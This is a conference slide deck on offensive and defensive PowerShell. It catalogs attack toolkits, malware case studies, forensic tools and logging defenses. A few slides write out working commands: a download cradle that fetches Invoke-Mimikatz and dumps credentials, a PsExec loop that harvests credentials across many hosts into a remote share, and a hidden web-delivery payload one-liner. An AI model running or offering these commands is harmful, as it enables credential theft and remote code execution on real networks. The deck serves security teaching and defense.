The document provides an extensive overview of PowerShell for cybersecurity professionals, covering its capabilities, tools, and modules useful for both offensive and defensive operations in IT environments. It discusses various PowerShell attack tools, such as PowerSploit and Nishang, which can be employed for tasks like credential harvesting and privilege escalation. Additionally, it addresses remote management features, execution policies, and practical examples of PowerShell's application in penetration testing and malware analysis.

1. PowerShell for Cyber Warriors
1
by Russel Van Tuyl

2. Who Am I?
2
• Security Analyst
• TN Air National Guard
• SANS MSISE Student
• Father of 2, Husband to 1
• Russel.VanTuyl@gmail.com
• @Ne0nd0g

3. Disclaimer
3

4. Outline
4
• Introduction to PowerShell
• Basics
• Module Loading
• PSRemoting
• Attack Tools
• Tool Suites
• powershell.exe Alternatives
• Agents
• Malware
• Forensic/Reverse Engineering Tools
• Defending Attacks

5. What is PowerShell?
5
Windows PowerShell is an interactive object-oriented
command environment with scripting language features
that utilizes small programs called cmdlets to simplify
configuration, administration, and management of
heterogeneous environments in both standalone and
networked typologies by utilizing standards-based
remoting protocols.

6. PowerShell Basics
6
• powershell.exe
• Built on .NET Framework
• Verb-Noun
• Tab Complete
• Alias
• Structured Data/Objects
• Syntax Highlighting (version 5)
• Released in 2006 on XP*/Vista/Server
2003
• .ps1
• Modules .psm1
• Integrated Scripting Environment (ISE)
• Compile to .exe

7. PowerShell Basics
7
Get-Help

8. PowerShell Basics
8
Get-Member

9. Use Cases
9
Why it is used
• Powerful tool for interacting with
Windows
• PSRemoting
• Future SSH Integration
• Antivirus/Application Blacklisting Bypass
• Red Team
• Blue Team
• Malware
• In Memory only execution

10. PSRemoting
10
• Disabled by default
• Enable-PSRemoting –Force
• Trusted hosts
• 5985 (HTTP)/5986 (HTTPS)
• 47001
• Invoke-Command
• Enter-PSSession

11. Module & Script Loading
11
Execution Policy
Import-Module
Dot Sourcing

12. IEX Download Cradle
12
• Download from
anywhere
• SMB
• HTTP
• In-Memory
• No files on disk

13. PowerShell Tools - Attack
13
• PowerSploit
• Nishang
• PowerCat
• Inveigh
• Empire
• DarkObserver
• PowerShell Suite
• PowerMemory
• PowerShellArsenal
• PowerShell-AD-Recon
• Fathomless
• PoshRat
• Metasploit
• DSInternals
• DSCompromised
• OWA-Toolkit

14. PowerMemory
14
Pierre-Alexandre Braeken - @pabraeken - https://github.com/giMini/PowerMemory/
• Capabilities
• Grab Credentials from Memory
• Perform Active Directory Assessment
• Scan Service Network
• Flow of Operations
• Creates a memory dump
• Reads the memory dump
• Decrypts the memory dump
• Exfiltrate
• Does not inject into other processes
• Uses Microsoft Signed Binaries
• Uses WMI for remote dump
• Virtual Machine Snapshots
• Works on Windows 10/Server 2016

15. PowerMemory
15
Pierre-Alexandre Braeken - @pabraeken - https://github.com/giMini/PowerMemory/

16. PowerMemory
16
Pierre-Alexandre Braeken - @pabraeken - https://github.com/giMini/PowerMemory/

17. PowerShell-AD-Recon
17
Sean Metcalf - @PyroTek3 - https://github.com/PyroTek3/PowerShell-AD-Recon
• Discover-PSInterestingServices
• Discover network servers with interesting services
without port scanning
• Discover-PSMSExchangeServers
• Discover Microsoft Exchange servers without port
scanning
• Discover-PSMSSQLServers
• Discover Microsoft SQL servers without port scanning
• Find-PSServiceAccounts
• Discovers all user accounts configured with a
ServicePrincipalName in the Active Directory domain or
forest
• Get-DomainKerberosPolicy
• Get-PSADForestInfo
• Get-PSADForestKRBTGTInfo

18. PowerShell-AD-Recon by Sean Metcalf @PyroTek3
18
Sean Metcalf - @PyroTek3 - https://github.com/PyroTek3/PowerShell-AD-Recon

19. FTP w/ Powershell
19
John Savill - http://windowsitpro.com/windows/ftp-using-powershell

20. DSInternals PowerShell Module
20
Michael Grafnetter - @mgrafnetter - https://github.com/MichaelGrafnetter/DSInternals
Offline AD Database Access:
• Get-ADDBAccount
• Get-ADDBDomainController
• Get-BootKey
• Get-ADDBBackupKey
• Get-ADDBSchemaAttribute
• Add-ADDBSidHistory
• Set-ADDBPrimaryGroup
• Set-ADDBDomainController
• Set-ADDBBootKey
• Remove-ADDBObject
Online AD Database Access:
• Get-ADReplAccount
• Get-ADReplBackupKey
• Set-SamAccountPasswordHash
Password Hash Calculation:
• ConvertTo-NTHash
• ConvertTo-LMHash
• ConvertTo-OrgIdHash
Password Decryption:
• ConvertFrom-ADManagedPasswordBlob
• ConvertFrom-UnicodePassword
• ConvertTo-UnicodePassword
• ConvertFrom-GPPrefPassword
• ConvertTo-GPPrefPassword
Misc:
• ConvertTo-Hex
• Save-DPAPIBlob

21. DSInternals – ntds.dit
21

22. DarkObserver
22
Ian Anderson - https://github.com/imander/DarkObserver

23. OWA-Toolkit
23
https://github.com/Shellntel/OWA-Toolkit
• OTK-Init
• A base cmd-let to produce an Exchange Web Service object
• Brute-EWS
• Brute force credentials by testing credentials against an Exchange Web Service
• Steal-GAL
• Enumerate and copy the Global Address List from an exposed Exchange Web Service

24. Powercat
24
https://github.com/besimorhino/powercat

25. Powercat
25
PowerShell Shell

26. Inveigh
26
Kevin Robertson - @kevin_robertson - https://github.com/Kevin-Robertson/Inveigh

27. PowerTools
27
Will Schroeder/Justin Warner - @harmj0y/@sixdub - https://github.com/PowerShellEmpire/PowerTools
• PewPewPew
• Scripts that utilize a common pattern to host a script on a PowerShell webserver, invoke the IEX
download cradle to download/execute the target code and post the results back to the server, and then
post-process any results.
• PowerBreach
• A backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system
• PowerPick
• This project focuses on allowing the execution of PowerShell functionality without the use of
powershell.exe. Primarily this project uses.NET assemblies/libraries to start execution of the PowerShell
scripts.
• PowerUp
• A PowerShell tool to assist with local privilege escalation on Windows systems.
• PowerView
• A PowerShell tool to gain network situational awareness on Windows domains.

28. PowerView
28
Functions
Misc Functions (21):
Get-DomainSID - return the SID for the specified domain
Convert-SidToName - converts a security identifier (SID) to a group/user name
Get-Proxy - enumerates local proxy settings
Get-UserProperty - returns all properties specified for users, or a set of user:prop names
Find-InterestingFile - search a local or remote path for files with specific terms in the name
Invoke-CheckLocalAdminAccess - check if the current user context has local administrator access to a specified host
Net * Functions (26):
Get-NetForestDomain - gets all domains for the current forest
Get-NetDomainController - gets the domain controllers for the current computer's domain
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetComputer - gets a list of all current servers in the domain
Get-NetGroupMember - gets a list of all current users in a specified domain group
Get-NetFileServer - get a list of file servers used by current domain users
GPO Functions (6):
Get-NetGPO - gets all current GPOs for a given domain
Get-DomainPolicy - returns the default domain or DC policy

29. PowerView
29
Functions
User-Hunting Functions (4):
Invoke-UserHunter - finds machines on the local domain where specified users are logged into, and can optionally
check if the current user has local admin access to found machines
Invoke-StealthUserHunter - finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file
server, hunting for particular users
Domain Trust Functions (5):
Get-NetDomainTrust - gets all trusts for the current user's domain
Invoke-MapDomainTrust - try to build a relational mapping of all domain trusts
Meta Functions (7):
Find-LocalAdminAccess - finds machines on the domain that the current user has local admin access to
Get-ExploitableSystem - finds systems likely vulnerable to common exploits
Invoke-EnumerateLocalAdmin - enumerates members of the local Administrators groups across all machines in the domain

30. PowerView
30
Misc Functions

31. PowerView
31
Get-NetUser

32. PowerView
32
Get-NetGroupMember

33. PowerView
33
GPO Functions

34. PowerView
34
Invoke-UserHunter

35. PowerSploit
35
Matt Graber et al - https://github.com/mattifestation/PowerSploit
CodeExecution(5) - Execute code on a target machine.
Invoke-DllInjection Injects a Dll into the process ID of your choosing.
Invoke-ReflectivePEInjection Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively
injects a DLL in to a remote process.
Invoke-Shellcode Injects shellcode into the process ID of your choosing or within PowerShell locally.
Invoke-WmiCommand Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using
WMI as a C2 channel.
ScriptModification(4) - Modify and/or prepare scripts for execution on a compromised machine.
Out-EncodedCommand Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload
script.
Out-EncryptedScript Encrypts text files/scripts.
Persistence(5) - Add persistence capabilities to a PowerShell script
Add-Persistence Add persistence capabilities to a script.
AntivirusBypass(1) - AV doesn't stand a chance against PowerShell!
Find-AVSignature Locates single Byte AV signatures utilizing the same method as DSplit from "class101".

36. PowerSploit
36
Functions

37. PowerSploit
37
Functions
Privesc (1) - Tools to help with escalating privileges on a target.
PowerUp Clearing house of common privilege escalation checks, along with some weaponization vectors.
Recon(4) - Tools to aid in the reconnaissance phase of a penetration test.
Invoke-Portscan Does a simple port scan using regular sockets, based (pretty) loosely on nmap.
Get-HttpStatus Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.
Invoke-ReverseDnsLookup Scans an IP address range for DNS PTR records.
PowerView Series of functions that performs network and Windows domain enumeration and exploitation.

38. PowerSploit
39
MSFVenom

39. PowerSploit
40
Invoke-Shellcode

40. PowerSploit
41
Out-EncodedCommand

41. PowerSploit
42
Get-Keystrokes

42. PowerSploit
43
Invoke-Portscan

43. Invoke-Mimikatz
44
IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds

44. Mass Mimikatz Part 3
45
https://www.swordshield.com/2015/05/dumping-a-domain-worth-of-passwords-with-mimikatz-part-3/

45. Mass Mimikatz Part 3
46
ForEach ($h in Get-Content C:hosts.txt){C:PsExec.exe $h -d -e -u
ACMEbob -p P@$$word1 -s cmd /c powershell -nop -command “& {IEX
((new-object
net.webclient).downloadstring(‘172.16.1.205dataInvoke-
Mimikatz.ps1′));Invoke-Mimikatz -DumpCreds >
172.16.1.205data%COMPUTERNAME%.txt}”}

46. Mass Mimikatz Part 3
47

47. Nishang
48
Nikhil "SamratAshok" Mittal - @nikhil_mitt - https://github.com/samratashok/nishang
Antak Execute PowerShell scripts in memory, run commands, and download and upload files using this
webshell.
Prasadhak Check running hashes of running process against the VirusTotal database.
Powerpreter All the functionality of nishang in a single script module.
Backdoors(6)
HTTP-Backdoor A backdoor which can receive instructions from third party websites and execute PowerShell
scripts in memory.
DNS_TXT_Pwnage A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them
on a target, and be remotely controlled using the queries..
Gupt-Backdoor A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
Client(7)
Out-Word Create Word files and infect existing ones to run PowerShell commands and scripts..
Out-HTA Create a HTA file which can be deployed on a web server and used in phishing campaigns.
Out-Java Create signed JAR files which can be used with applets for script and command execution.
Escalation(3)
Enable-DuplicateToken When SYSTEM privileges are required.
Invoke-PsUACme Bypass UAC.

48. Nishang
49
Functions
Execution(4)
Download_Execute Download an executable in text format, convert it to an executable, and execute.
Execute-DNSTXT-Code Execute shellcode in memory using DNS TXT queries.
Gather(13)
Invoke-CredentialsPhish Trick a user into giving credentials in plain text.
FireBuster FireListener A pair of scripts for egress testing
Get-PassHashes Get password hashes from a target.
Get-WLAN-Keys Get WLAN keys in plain text from a target.
Invoke-MimikatzWdigestDowngrade Dump user passwords in plain on Windows 8.1 and Server 2012
Show-TargetScreen Connect back and Stream target screen using MJPEG
Pivot(3)
Invoke-NetworkRelay Create network relays between computers.
Scan(2)
Brute-Force Brute force FTP, Active Directory, MSSQL, and Sharepoint.

49. Nishang
50
Functions
Shells(11)
Invoke-PsGcat Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
Invoke-PowerShellTcp An interactive PowerShell reverse connect or bind shell
Invoke-PowerShellUdp An interactive PowerShell reverse connect or bind shell over UDP
Invoke-PoshRatHttps Reverse interactive PowerShell over HTTPS.
Invoke-PowerShellIcmp An interactive PowerShell reverse shell over ICMP.
Utility(9)
Add-Exfiltration Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
Add-Persistence Add reboot persistence capability to a script.
Parse_Keys Parse keys logged by the keylogger.
Invoke-Encode Encode and compress a script or string.
Invoke-Decode Decode and decompress a script or string from Invoke-Encode.
Start-CaptureServer Run a web server which logs Basic authentication and SMB hashes.

50. Nishang
51
Get-WLAN-Keys

51. PowerShell Suite
53
https://github.com/FuzzySecurity/PowerShell-Suite
• Invoke-Runas
• Functionally equivalent to Windows "runas.exe", using Advapi32::CreateProcessWithLogonW
• Invoke-NetSessionEnum
• Use Netapi32::NetSessionEnum to enumerate active sessions on domain joined machines
• Invoke-CreateProcess
• Use Kernel32::CreateProcess to achieve fine-grained control over process creation from PowerShell.
• Conjure-LSASS
• SeDebugPrivilege to duplicate the LSASS access token and impersonate it in the calling thread
• Invoke-MS16-032
• Discovered by James Forshaw
• Subvert-PE
• Inject shellcode into a PE image while retaining the PE functionality.
• Calculate-Hash
• PowerShell v2 compatible script to calculate file hashes
• Check-VTFile
• Submit SHA256 hash of a file to Virus Total and retrieve the scan report if the hash is known

52. Invoke-Runas.ps1
54
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

53. Subvert-PE
56
Powershell PE Injection

54. PS> Attack
57
Jared Haight - @jaredhaight - https://github.com/jaredhaight/PSAttack
• Precompiled, self contained, portable console
• No powershell.exe, .Net 3.5
• Modules are encrypted, decrypted in memory
• Modules
• Powersploit
• PowerTools
• Nishang
• Powercat
• Inveigh
• MS16-032
• Hot Potato
• Invoke-MetasploitPayload

55. Not PowerShell
58
Ben Ten - @ben0xa - https://github.com/Ben0xA/nps

56. PoshRat
59
Casey Smith - @subTee - https://github.com/subTee/PoshRat
Server:
Target:
• JSRat.ps1
• PoshRat-Socket.ps1
• PoshRatHTTP.ps1
• PoshRatHTTPS.ps1
• PoshRatWebDAV.ps1

57. Metasploit
60
Modules
encoder/cmd/powershell_base64 Powershell Base64 Command Encoder
exploit/windows/local/powershell_cmd_upgrade Windows Command Shell Upgrade (Powershell)
exploit/windows/local/powershell_remoting Powershell Remoting Remote Command Execution
exploit/windows/smb/psexec_psh Microsoft Windows Authenticated Powershell Command
Execution
payload/cmd/windows/powershell_bind_tcp Windows Interactive Powershell Session, Bind TCP
payload/cmd/windows/powershell_reverse_tcp Windows Interactive Powershell Session, Reverse TCP
payload/cmd/windows/reverse_powershell Windows Command Shell, Reverse TCP (via Powershell)
payload/windows/powershell_bind_tcp Windows Interactive Powershell Session, Bind TCP
payload/windows/powershell_reverse_tcp Windows Interactive Powershell Session, Reverse TCP
payload/windows/x64/powershell_bind_tcp Windows Interactive Powershell Session, Bind TCP
payload/windows/x64/powershell_reverse_tcp Windows Interactive Powershell Session, Reverse TCP
post/windows/gather/enum_powershell_env Windows Gather Powershell Environment Setting Enumeration
post/windows/manage/exec_powershell Windows Powershell Execution Post Module
post/windows/manage/powershell/exec_powershell Windows Manage PowerShell Download and/or Execute
post/windows/manage/powershell/load_script Load Scripts Into PowerShell Session

58. Metasploit – PowerShell Payloads
61
windows/powershell_bind_tcp - windows/powershell_reverse_tcp

59. Metasploit – Meterpreter Extension
63

60. Metasploit – Meterpreter .NET namespaces
64
• Elevate
• FileSystem
• Incognito
• Kiwi
• Sys
• Transport
• User

61. Metasploit – Web Delivery
66
powershell.exe -nop -w hidden -c $m=new-object
net.webclient;$m.proxy=[Net.WebRequest]::GetSystemWebProxy();$m.Proxy.Credentials=[Net.Credenti
alCache]::DefaultCredentials;IEX $m.downloadstring('http://192.168.56.104:8080/pwned');

62. Empire
68
Will Schroeder/Justin Warner/Matt Nelson - @harmj0y/@sixdub/@enigma0x3 - https://github.com/PowerShellEmpire/Empire
Empire is a pure PowerShell post-exploitation
agent built on cryptologically-secure
communications and a flexible architecture.
Empire implements the ability to run
PowerShell agents without needing
powershell.exe, rapidly deployable post-
exploitation modules ranging from key loggers
to Mimikatz, and adaptable communications
to evade network detection, all wrapped up in
a usability-focused framework.

63. Empire
69
Commands
========
agents Jump to the Agents menu.
creds Add/display credentials to/from the database.
exit Exit Empire
help Displays the help menu.
list Lists active agents or listeners.
listeners Interact with active listeners.
reload Reload one (or all) Empire modules.
reset Reset a global option (e.g. IP whitelists).
searchmodule Search Empire module names/descriptions.
set Set a global option (e.g. IP whitelists).
show Show a global option (e.g. IP whitelists).
usemodule Use an Empire module.
usestager Use an Empire stager.

64. Empire
70

65. PowerEmpire
71
Carlos Perez - @Carlos_Perez - https://gitlab.com/carlos_perez/PowerEmpire
• PowerShell
Management
• PowerShell Objects
• REST API

66. PowerEmpire
72
Carlos Perez - @Carlos_Perez - https://gitlab.com/carlos_perez/PowerEmpire

67. PowerEmpire
73

68. PowerShell Empire Web
74
Interference Security - https://github.com/interference-security/empire-web

69. PowerShell Malware
75

70. PowerWorm
76
• Email Campaign
• Infected MS Word/Excel w/ VBA
• VBA Executes PowerShell
• DNS TXT Records w/ URLs
• Download Tor/Polipo
• Downloads Additional PowerShell Script
• Establish C2
• Infects other MS Word/Excel Documents
• Modify Registry to Weaken MS Office Security
• Finds All .doc,.docx,.xls,.xlsx
• Embeds VBA
• Persists in Registry w/ Base64 Encoded Payload

71. McAfee Labs – Malicious .lnk
77
Marc Rivero Lopez - https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
• Email campaign w/ attached .rar file
• .rar file contained a .lnk file
• Bypass Execution Policy
• Opens hidden window
• Uses IEX download cradle to get new file
• Saves file to Temp
• Executes the file with cmd.exe
• Sandbox Bypass

72. Palo Alto - Powersniff
78
Palo Alto - http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
• Email Campaign
• Documents w/ Malicious Macros
• Injects Malware into Memory
• WMI Executes PowerShell
• Bypass ExecutionPolicy
• Opens Hidden Window
• Download .ps1 w/ Shellcode
• Decrypts & Executes payload
• Performs Recon
• HTTP GET to C2
• Downloads Encrypted .dll
• Executed w/ rundll32.exe

73. POWELIKS
79
• Hides in Windows Registry
• Downloads PowerShell if not Present
• Execute Encoded Script
• Executes Malware .dll
• Creates Null Autostart Entry
• Stores Encoded .dll in Registry
• .dll Injected into DLLHOST.EXE

74. Carbon Black - PowerWare
80
• Fileless
• Ransomware
• Spread via Spam w/ Attachment
• VBA Macro
• Run PowerShell via cmd.exe
• Download PowerShell Script
• PowerShell Encrypts Files

75. Incident Response & Defense
81

76. Kansa
82
Dave Hull - @davehull - https://github.com/davehull/Kansa/
• Modular Incident Response Framework
• PSRemoting for Data Collection
• Analysis Modules
• Remediation Steps
• Search for Breach
• Build Environmental Baseline
• Modules.conf

77. Kansa - Modules
83
ASEP
• Get-Autorunsc.ps1
• Get-AutorunscDeep.ps1
• Get-PSProfiles.ps1
• Get-SigCheckRandomPath.ps1
• Get-SigCheck.ps
• Get-SvcAll.ps1
• Get-SvcFail.ps1
• Get-SvcTrigs.ps1
• Get-WMIEvtConsumer.ps1
• Get-WMIEvtFilter.ps1
• Get-WMIFltConBind.ps1
Config
• Get-AMHealthStatus.ps1
• Get-AMInfectionStatus.ps1
• Get-CertStore.ps1
• Get-ClrVersion.ps1
• Get-GPResult.ps1
• Get-Hotfix.ps1
• Get-IIS.ps1
• Get-LocalAdmins.ps1
• Get-PSDotNetVersion.ps1
• Get-Products.ps1
• Get-SharePermissions.ps1
• Get-SmbShare.ps1

78. PowerForensics
84
Jared Atkinson - @jaredcatkinson - https://github.com/Invoke-IR/PowerForensics
Boot Sector
• Get-ForensicsMasterBootRecord
• Get-ForensicGuidPartitionTable
• Get-ForensicBootSector
• Get-ForensicPartitionTable
NTFS
• Get-ForensicAttrDef
• Get-ForensicBitmap
• Get-ForensicFileRecord
• Get-ForensicUsnJrnl
• Get-ForensicVolumeBootRecord
• Get-ForensicVolumeInformation
• Get-ForensicUnallocatedSpace
Windows Artifacts
• Get-AlternateDataStream
• Get-ForensicEventLog
• Get-ForensicOfficeFileMru
• Get-ForensicRunKey
• Get-ForensicTypedUrl
Windows Registry
• Get-ForensicRegistryKey
• Get-ForensicRegistryValue
Utilities
• ConvertFrom-BinaryData
• Copy-ForensicFile
• Get-ForensicChildItem
• Invoke-ForensicDD

79. PowerShellArsenal
85
Matt Graeber - @mattifestation - https://github.com/mattifestation/PowerShellArsenal
Disassembly(2): Disassemble native and managed code.
Get-CSDisassembly Disassembles a byte array using the Capstone Engine disassembly framework.
MalwareAnalysis(10): Useful tools when performing malware analysis.
New-FunctionDelegate Provides an executable wrapper for an X86 or X86_64 function.
Invoke-LoadLibrary Loads a DLL into the current PowerShell process.
New-DllExportFunction Creates an executable wrapper delegate around an unmanaged, exported function.
Get-AssemblyStrings Output all strings from a .NET executable.
Get-AssemblyResources Extract managed resources from a .NET assembly
MemoryTools(4): Inspect and analyze process memory
Get-ProcessStrings Outputs all printable strings from the user-mode memory of a process.
Get-VirtualMemoryInfo A wrapper for kernel32!VirtualQueryEx
Get-ProcessMemoryInfo Retrieve virtual memory information for every unique set of pages in user memory.

80. PowerShellArsenal
86
Functions
Parsers(4): Parse file formats and in-memory structures.
Get-PE An on-disk and in-memory PE parser and process dumper.
Find-ProcessPEs Finds portable executables in memory regardless of whether or not they were loaded in a
legitimate fashion.
Misc(4): Miscellaneous helper functions
Get-Member A proxy function used to extend the built-in Get-Member cmdlet. It adds the '-Private'
parameter allowing you to display non-public .NET members
ConvertTo-String Converts the bytes of a file to a string that has a 1-to-1 mapping back to the file's original
bytes. ConvertTo-String is useful for performing binary regular expressions.
Get-Entropy Calculates the entropy of a file or byte array.
WindowsInternals(6): Obtain and analyze low-level Windows OS information.
Get-PEB Returns the process environment block (PEB) of a process.
Register-ProcessModuleTrace Starts a trace of loaded process modules
Get-ProcessModuleTrace Displays the process modules that have been loaded since the call to Register-
ProcessModuleTrace

81. Defense – Windows Logging
87
PowerShell v5 Enhanced Logging
• Local Group Policy
• Administrative Templates
• Windows Components
• Windows PowerShell
• Module Logging (PSv3)
• Script Block Logging
• EncodedCommand
• XOR, Base64, ROT13
• Script Execution
• Transcription

82. Payload Encoding
88

83. PowerShell Event Log
89

84. PowerShell Language Modes
90
• FullLanguage
• ConstrainedLanguage
• ! Direct .Net Scripting
• ! Win32 API via Add-Type
• ! Interaction with COM objects
• RestrictedLanguage
• NoLanguage
• Environment Variable
• [Environment]::SetEnvironmentVariable(‘__PSLockdownPolicy‘, ‘4’, ‘Machine‘)
• GPO
• Computer ConfigurationPreferencesWindows SettingsEnvironment
• AppLocker “Allow Mode” Policy
• PowerShell v5

85. 91

86. Additional Resources
92
Blogs, Papers, and Videos
• https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf
• http://www.trustedsec.com/files/PowerShell_Defcon.pdf
• https://www.troopers.de/events/troopers14/123_powershell_for_hackers/
• http://www.irongeek.com/i.php?page=videos/derbycon5/break-me11-gray-hat-powershell-ben-ten
• http://www.darkoperator.com/powershellbasics/
• https://www.sixdub.net/?tag=powershell-hacking-redteam-veil
• http://www.labofapenetrationtester.com/
• https://waitfordebug.wordpress.com/2015/01/14/powershell-for-red-teaming/
• http://www.powershellempire.com/
• http://www.irongeek.com/i.php?page=videos/derbycon5/fix-me06-getting-started-with-
powershell-michael-wharton
• https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
• http://www.fuzzysecurity.com/tutorials/20.html

87. Windows Management Instrumentation (WMI)
93
Bonus Points
• WINDOWS MANAGEMENT INSTRUMENTATION (WMI) OFFENSE, DEFENSE, AND
FORENSICS
• FireEye
• https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-
windows-management-instrumentation.pdf
• WhyMI so Sexy? WMI Attacks, Real-Time Defense, and Advanced Forensic Analysis
• FireEye
• http://www.irongeek.com/i.php?page=videos/derbycon5/break-me12-whymi-so-
sexy-wmi-attacks-real-time-defense-and-advanced-forensic-analysis-matt-graeber-
willi-ballenthin-claudiu-teodorescu
• SprayWMI - a method for mass spraying unicorn powershell injection to CIDR notations.
• TrustedSec
• https://www.trustedsec.com/october-2015/new-tool-spraywmi-mass-wmi-pwnage/
• https://github.com/trustedsec/spraywmi

88. Conclusion
94